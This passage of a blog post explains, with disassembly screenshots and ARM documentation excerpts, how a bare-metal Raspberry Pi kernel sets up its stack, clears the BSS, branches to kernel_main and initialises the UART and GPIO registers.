font-size: 16px; font-weight: 600;">vector.s</span></div>
<div>
<script src="https://gist.github.com/k3170makan/44a1ee2d066590764f9a05ec98d49d40.js"></script>
<br />
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<br />
here's what it does with it in a file called <a href="https://github.com/dwelch67/raspberrypi/blob/master/boards/cpuid/cpuid.c">cpuid.c</a> file:</div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhG9ru3_-7F3Oe4xIYILHKrCcictuTmi_WQ27rPSljSxNj7BEvpjOCYFJYu4TOdnUTavY6nPBlIKmuNJ5PMN1_OsVlX233Wlu9y_ngKK9VOa5owaU1TfiHapoQ1yyXJUocJaxhVU80TIHU/s1600/getcpuid.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="537" data-original-width="613" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhG9ru3_-7F3Oe4xIYILHKrCcictuTmi_WQ27rPSljSxNj7BEvpjOCYFJYu4TOdnUTavY6nPBlIKmuNJ5PMN1_OsVlX233Wlu9y_ngKK9VOa5owaU1TfiHapoQ1yyXJUocJaxhVU80TIHU/s1600/getcpuid.PNG" /></a></div>
<div>
<br /></div>
<div>
Clearly it this is to determine the board type. I'm not delving into too much detail about the specific value we are checking and what it means to find this out I need to dig a little deeper in the board data sheets probably but my jury is out on hard confirmations about what opcode 5 does. None-the-less we can be pretty sure this is to make sure our code runs properly on the right board. Moving on!</div>
<div>
<br />
<h2 style="text-align: left;">
Reverse Engineering a basic C run time setup </h2>
<br /></div>
<div>
The next snippet of code looks like this:</div>
<div>
<script src="https://gist.github.com/k3170makan/9ae285019f90c142feca64a6bfcdd239.js"></script>
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<br /></div>
<div>
<br />
The <span style="font-family: "courier new" , "courier" , monospace;">mov sp </span>instruction points the stack address at <span style="font-family: "courier new" , "courier" , monospace;">0x8000 </span>afaik there's some flexibility in which value you use, but it might also depend on your board type. After that we see a <span style="font-family: "courier new" , "courier" , monospace;">ldr </span>instruction here, this is the definition of this operation according to the documentation:</div>
<div>
<div style="text-align: left;">
<br /></div>
<div style="background-color: white; font-family: Verdana, Tahoma, Arial, Helvetica, sans-serif; font-size: small; margin-bottom: 0.2em !important; margin-top: 0.4em !important;">
The <code class="code" style="color: #333399; font-family: "Lucida Sans Typewriter", "Courier New", Courier, monospace; font-size: 0.9em;">LDR</code> pseudo-instruction loads a register with either:</div>
<div class="itemizedlist" style="background-color: white; font-family: Verdana, Tahoma, Arial, Helvetica, sans-serif; font-size: small;">
<ul compact="compact" style="margin-bottom: 0.2em; margin-top: 0.4em;" type="disc">
<li style="margin-bottom: 0.2em; margin-top: 0.3em;"><div style="margin-bottom: 0.2em; margin-top: 0.3em;">
a 32-bit constant value</div>
</li>
<li style="margin-bottom: 0.2em; margin-top: 0.3em;"><div style="margin-bottom: 0.2em; margin-top: 0.3em;">
an address.</div>
</li>
</ul>
</div>
<div style="text-align: left;">
- <a href="http://infocenter.arm.com/help/index.jsp?topic=/com.arm.doc.dui0041c/Babbfdih.html">http://infocenter.arm.com/help/index.jsp?topic=/com.arm.doc.dui0041c/Babbfdih.html </a></div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
This code is pretty straight forward then; it loads the addresses of where the labels <span style="font-family: "courier new" , "courier" , monospace;">__bss_start</span> and <span style="font-family: "courier new" , "courier" , monospace;">__bss_end</span> are into registers <span style="font-family: "courier new" , "courier" , monospace;">r4 </span>and <span style="font-family: "courier new" , "courier" , monospace;">r9 </span>respectively. It then 0's out the values of registers <span style="font-family: "courier new" , "courier" , monospace;">r5-r</span>8. After all this it issues a <span style="font-family: "courier new" , "courier" , monospace;">b 2f </span>instruction, which means it will branch unconditionally to label <span style="font-family: "courier new" , "courier" , monospace;">2</span> and start executing there. We can confirm this by looking at the assembler code for this: </div>
<div style="text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjVn7KaPIA0XpChRMXiZcCZj-1wXoihgADgJ7TVPSlKrOON8fn3daPpEADlcG68_7EW7D5kMFDCfcCnuradcDhxoDCx4b9r-StrsEDv8Hl6OeZkIzZGyUnpNsje_E9i2G_tHOQWr8o6GyI/s1600/bl2f.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="154" data-original-width="663" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjVn7KaPIA0XpChRMXiZcCZj-1wXoihgADgJ7TVPSlKrOON8fn3daPpEADlcG68_7EW7D5kMFDCfcCnuradcDhxoDCx4b9r-StrsEDv8Hl6OeZkIzZGyUnpNsje_E9i2G_tHOQWr8o6GyI/s1600/bl2f.PNG" /></a></div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
The instruction at <span style="font-family: "courier new" , "courier" , monospace;">802c </span>reads <span style="font-family: "courier new" , "courier" , monospace;">b 8034 <__start+0x34></span> shows that it will branch to the <span style="font-family: "courier new" , "courier" , monospace;">cmp r4,r9</span> instruction which is according to <span style="font-family: "courier new" , "courier" , monospace;">boot.S</span> the first instruction under label <span style="font-family: "courier new" , "courier" , monospace;">2</span>. After the comparison it does another conditional branch based on whether the two registers are equal or not. If they are it repeats the loop by branching back to <span style="font-family: "courier new" , "courier" , monospace;">_start+0x30</span> which has this instruction:</div>
<div style="text-align: left;">
<br /></div>
<blockquote class="tr_bq" style="text-align: left;">
<blockquote class="tr_bq">
<span style="background-color: white; color: #24292e; font-family: "courier new" , "courier" , monospace; white-space: pre;">stmia r4!,{r5-r8}</span></blockquote>
</blockquote>
<div style="text-align: left;">
<span style="background-color: white; color: #24292e; font-family: , "consolas" , "liberation mono" , "menlo" , "courier" , monospace; font-size: 12px; white-space: pre;"><br /></span></div>
<div style="text-align: left;">
The <span style="font-family: "courier new" , "courier" , monospace;">stm </span>instruction stores a set of values constructed from the list registers' values in the braces (<i>here our example is all the registers from r5-r8's a total of 16 bytes</i>). at the address pointed to by the register value specified These register values are written contiguously to the address in memory pointed to by <span style="font-family: "courier new" , "courier" , monospace;">r4</span>. The exclamation suffix means write the final address back to <span style="font-family: "courier new" , "courier" , monospace;">r4. </span><span style="font-family: "courier new" , "courier" , monospace;">stm </span>has a <span style="font-family: "courier new" , "courier" , monospace;">ia </span>suffix because it will automatically increment <span style="font-family: "courier new" , "courier" , monospace;">r4 </span>after writing to it. This allows us to slam 16 bytes into memory at a time.<br />
<br />
Whats happening here may seem odd, but its pretty standard parlance in cleaning out memory sections in order to prep a C run time. Here's some example's from other people's rapsberry pi kernels. This one is also cleaning out the bss, you can see it does some other C/C++ run time prep stuff too:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiMfDw6uHKso3LDPLibNwBZLZS8giBvGJLUCBjeituKJ4_KnItJ3h2IAmRaX3QWbYvkNOUDbMY4nSZeeRWZ63fGvQGuzkmCYem6zzA0IlL3Htmlymyur5LTe6Whym1vwn_jnsGCN5w-zGk/s1600/init_data_bss.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="637" data-original-width="658" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiMfDw6uHKso3LDPLibNwBZLZS8giBvGJLUCBjeituKJ4_KnItJ3h2IAmRaX3QWbYvkNOUDbMY4nSZeeRWZ63fGvQGuzkmCYem6zzA0IlL3Htmlymyur5LTe6Whym1vwn_jnsGCN5w-zGk/s1600/init_data_bss.PNG" /></a></div>
<br />
<br />
The code in the section labeled "<i>Initialize the .data section</i>" copies stuff out of memory using a <span style="font-family: "courier new" , "courier" , monospace;">ldrlo </span>instruction which reads 4 bytes from the address <span style="font-family: "courier new" , "courier" , monospace;">[r1]</span> which we can see is initialized as <span style="font-family: "courier new" , "courier" , monospace;">__data_init_start</span> then it stores it to the memory address <span style="font-family: "courier new" , "courier" , monospace;">[r2]</span> immediately after using the <span style="font-family: "courier new" , "courier" , monospace;">strlo </span>operation. Very similar structure to what we are doing. This post called "Building Bare metal ARM systems with GNU" shows some more <a href="https://www.embedded.com/design/mcus-processors-and-socs/4026075/Building-Bare-Metal-ARM-Systems-with-GNU-Part-2">https://www.embedded.com/design/mcus-processors-and-socs/4026075/Building-Bare-Metal-ARM-Systems-with-GNU-Part-2</a><br />
<br />
Okay so lets say we are done setting up our C runtime, the next thing boot.S does is branch to the kernel like so:<br />
<br />
<blockquote class="tr_bq">
<span style="font-family: "courier new" , "courier" , monospace;">ldr r3,=kernel_main<br />blx r3</span></blockquote>
<br />
The blx instruction is pretty important it means branch with link exchange and it will transfer control to the kernel's main function.<br />
<br />
<h2 style="text-align: left;">
Reverse Engineering Basic UART I/O initialization </h2>
<br />
Once it breaks into the kernel it passes it a couple arguments this is the location of the atags structure in memory. I will get into that perhaps in a later post but what I want to focus on here is how the uart_init and kernel main functions look at assembler level.<br />
<br />
Here's the kernel main:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgQ-msDFR4AiqYtO44VmyMyrbpYisVtqzHqupSLR1ytMLTl3f3hoQ2KfCWkZf9DHactiB-iNKLirQ-j_LIIPawyvd4PVQFW5ljvtIrxlFUJURaKvbKZ5lTACJbxzJcekMrdn8_VwXzV3ic/s1600/2-kernel_main-objdump.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="270" data-original-width="810" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgQ-msDFR4AiqYtO44VmyMyrbpYisVtqzHqupSLR1ytMLTl3f3hoQ2KfCWkZf9DHactiB-iNKLirQ-j_LIIPawyvd4PVQFW5ljvtIrxlFUJURaKvbKZ5lTACJbxzJcekMrdn8_VwXzV3ic/s1600/2-kernel_main-objdump.PNG" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
Lets break this down. Firs instruction is a push to preserve the <span style="font-family: Courier New, Courier, monospace;">r4 </span>and link registers according to the sources I have here this is done because the <span style="font-family: Courier New, Courier, monospace;">r4 </span>register holds the <span style="font-family: Courier New, Courier, monospace;">atags </span>start address which is passed to the kernel on start. What happens then is the kernel branches immediately to <span style="font-family: Courier New, Courier, monospace;">uart_init</span> which looks like this:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjIJmeh3m-r3lgAuBzLwD5jdUu4e1ZiAYugRogZDRRbP8QRzjIQzukpMRfWn4Vlkso3LYsYhd5qIMRWKvzrgPaJKYU0uraYZP9WWVnQ5SFOY5WvHD4kbTUzuBkCcsLtx-T-NX_8dhmnCkQ/s1600/uart_init.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="201" data-original-width="657" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjIJmeh3m-r3lgAuBzLwD5jdUu4e1ZiAYugRogZDRRbP8QRzjIQzukpMRfWn4Vlkso3LYsYhd5qIMRWKvzrgPaJKYU0uraYZP9WWVnQ5SFOY5WvHD4kbTUzuBkCcsLtx-T-NX_8dhmnCkQ/s1600/uart_init.PNG" /></a></div>
<br />
<br />
Doesn't look like too much of a monster all it does here is essentially shuffle some values around. First instruction puts a 0 into <span style="font-family: Courier New, Courier, monospace;">r1 </span>which is being used as a place holder for 0 and clears it for later use as well. The next two instructions constructs the base value for the GPIO reference structure, it does this by first putting <span style="font-family: Courier New, Courier, monospace;">0x1000 </span>in the bottom half of the <span style="font-family: Courier New, Courier, monospace;">r3 </span>register value and then using a <span style="font-family: Courier New, Courier, monospace;">movt </span>to stick the top <span style="font-family: Courier New, Courier, monospace;">0x3f20 </span>bits in. Here's the documentation on the <span style="font-family: Courier New, Courier, monospace;">movt </span>instruction:<br />
<br />
<div class="sect2" lang="en" style="font-family: Verdana, Tahoma, Arial, Helvetica, sans-serif; font-size: small; margin-bottom: 0.2em !important; margin-top: 0.4em !important;" xml:lang="en">
<div class="titlepage">
<div>
</div>
</div>
<div style="margin-bottom: 0.2em !important; margin-top: 0.4em !important;">
Move Top. Writes a 16-bit immediate value to the top halfword of a register, without affecting the bottom halfword.</div>
<div class="sect3" lang="en" xml:lang="en">
<div class="titlepage">
<h4 class="title" style="clear: both; font-size: 1.1em; margin-bottom: 0px; margin-top: 1.2em;">
<a href="https://www.blogger.com/null" id="id4694609"></a>Syntax</h4>
</div>
<pre class="synopsis" style="color: #333399; font-family: "Lucida Sans Typewriter", "Courier New", Courier, monospace; font-size: 0.9em; margin-bottom: 0.2em !important; margin-left: 0.5em; margin-top: 0.4em !important;">MOVT{<em class="replaceable"><code style="color: inherit; font-family: inherit; font-size: 11.7px;">cond</code></em>} <em class="replaceable"><code style="color: inherit; font-family: inherit; font-size: 11.7px;">Rd</code></em>, #<em class="replaceable"><code style="color: inherit; font-family: inherit; font-size: 11.7px;">immed_16</code></em></pre>
</div>
</div>
Pretty useful stuff if gives you some flexibility in shuffling around byte values. So it makes <span style="font-family: Courier New, Courier, monospace;">r3 </span>hold the value <span style="font-family: Courier New, Courier, monospace;">0x3f201000 </span>which we know from the code is the <span style="font-family: Courier New, Courier, monospace;">UART_BASE </span>address:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjzSn2ETh11H4G3q8bqoyE3_0Po9s73uDdiF3yBNnP7ftAPPxL570EHdRSxTbasKT_AOTyENslIgd8pCJ94q8PJgHOQKzEsozeT-g0hfAv9MkFnV2tj9jlpIJRBYMUKkLGUY0w4dyooDC8/s1600/uart_base.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="138" data-original-width="364" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjzSn2ETh11H4G3q8bqoyE3_0Po9s73uDdiF3yBNnP7ftAPPxL570EHdRSxTbasKT_AOTyENslIgd8pCJ94q8PJgHOQKzEsozeT-g0hfAv9MkFnV2tj9jlpIJRBYMUKkLGUY0w4dyooDC8/s1600/uart_base.PNG" /></a></div>
Then it sets up another offset in the GPIO <span style="font-family: Courier New, Courier, monospace;">enum</span>; but this one using <span style="font-family: Courier New, Courier, monospace;">r1 </span>(which points to <span style="font-family: Courier New, Courier, monospace;">GPIO_BASE</span> via another <span style="font-family: Courier New, Courier, monospace;">movt</span>) it moves a value into <span style="font-family: Courier New, Courier, monospace;">r2 </span>but I suspect this is only going to make sense later on (lets skip it for now). With those two pointers set up it performs a str instruction using the <span style="font-family: Courier New, Courier, monospace;">r0 </span>value which 0, and writing it to <span style="font-family: Courier New, Courier, monospace;">r3+0x30 </span>which is <span style="font-family: Courier New, Courier, monospace;">UART_CR </span>and if we look at the code again this is exactly what its doing, just setting the memory address pointed to by <span style="font-family: Courier New, Courier, monospace;">UART_CR </span>to 0:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiQVmNdjwAustOz8IqALHXsruwbU0t4S3KhQjWVm0TKZbas2D1pLR5RSat_8uS72onAiNme7_t51HBb8vVWu55kvoL157gPNdM-_AQstBGBDV1hntu_MxkO3CGZOn8_HQacEiJUGJ06OA8/s1600/uart_init.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="68" data-original-width="357" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiQVmNdjwAustOz8IqALHXsruwbU0t4S3KhQjWVm0TKZbas2D1pLR5RSat_8uS72onAiNme7_t51HBb8vVWu55kvoL157gPNdM-_AQstBGBDV1hntu_MxkO3CGZOn8_HQacEiJUGJ06OA8/s1600/uart_init.PNG" /></a></div>
<br />
<br />
Same goes for the r1 str operation of course. We know <span style="font-family: Courier New, Courier, monospace;">r1 </span>points to <span style="font-family: Courier New, Courier, monospace;">GPIO_BASE</span>, and the <span style="font-family: Courier New, Courier, monospace;">str </span>writes to<span style="font-family: Courier New, Courier, monospace;"> r1+0x94</span> which is <span style="font-family: Courier New, Courier, monospace;">GPPUD</span>.<br />
<br />
Okay the rest of the kernel operations are no different to this really they just perform writes to different offsets. I think if you'd like to git gud at reverse engineering these kinds of functions try reversing the rest of the kernel and then looking for some other kernels that do something like this and see if you can reverse engineer out how they do it and where. Have fun! </div>
<h2 style="text-align: left;">
Reading and references</h2>
<br />
<ul style="text-align: left;">
<li>Bare bones RaspberryPi OS https://wiki.osdev.org/Raspberry_Pi_Bare_Bones </li>
<li>Vector.s https://github.com/dwelch67/raspberrypi/blob/master/boards/cpuid/vectors.s </li>
<li><a href="https://www.techrepublic.com/blog/european-technology/build-your-own-os-using-the-raspberry-pi/">https://www.techrepublic.com/blog/european-technology/build-your-own-os-using-the-raspberry-pi/</a> </li>
<li><a href="https://jsandler18.github.io/">https://jsandler18.github.io/</a> </li>
<li><a href="http://infocenter.arm.com/help/index.jsp?topic=/com.arm.doc.dui0068b/CIHEEIDJ.html">http://infocenter.arm.com/help/index.jsp?topic=/com.arm.doc.dui0068b/CIHEEIDJ.html</a> </li>
<li><a href="http://infocenter.arm.com/help/index.jsp?topic=/com.arm.doc.ddi0464e/CHDGECEI.htm">http://infocenter.arm.com/help/index.jsp?topic=/com.arm.doc.ddi0464e/CHDGECEI.htm</a>l </li>
<li><a href="http://infocenter.arm.com/help/index.jsp?topic=/com.arm.doc.ddi0360f/CHDGIJFB.html">http://infocenter.arm.com/help/index.jsp?topic=/com.arm.doc.ddi0360f/CHDGIJFB.html</a> </li>
<li>C0 Main ID Register <a href="http://infocenter.arm.com/help/index.jsp?topic=/com.arm.doc.ddi0360f/I65012.html">http://infocenter.arm.com/help/index.jsp?topic=/com.arm.doc.ddi0360f/I65012.html</a> </li>
<li>Load Register Byte <a href="http://infocenter.arm.com/help/index.jsp?topic=/com.arm.doc.dui0802a/LDRB_imm.html">http://infocenter.arm.com/help/index.jsp?topic=/com.arm.doc.dui0802a/LDRB_imm.html</a> </li>
<li>BCM2835 Specifications <a href="https://www.raspberrypi.org/documentation/hardware/raspberrypi/bcm2835/README.md">https://www.raspberrypi.org/documentation/hardware/raspberrypi/bcm2835/README.md</a> </li>
<li>ARM11 Tech reference manual http://infocenter.arm.com/help/index.jsp?topic=/com.arm.doc.ddi0301h/index.html </li>
<li>c0 Coprocessor Registers http://infocenter.arm.com/help/index.jsp?topic=/com.arm.doc.ddi0464f/index.html </li>
</ul>
</div>
</div>
Keith Makanhttp://www.blogger.com/profile/10220395050030522020noreply@blogger.com0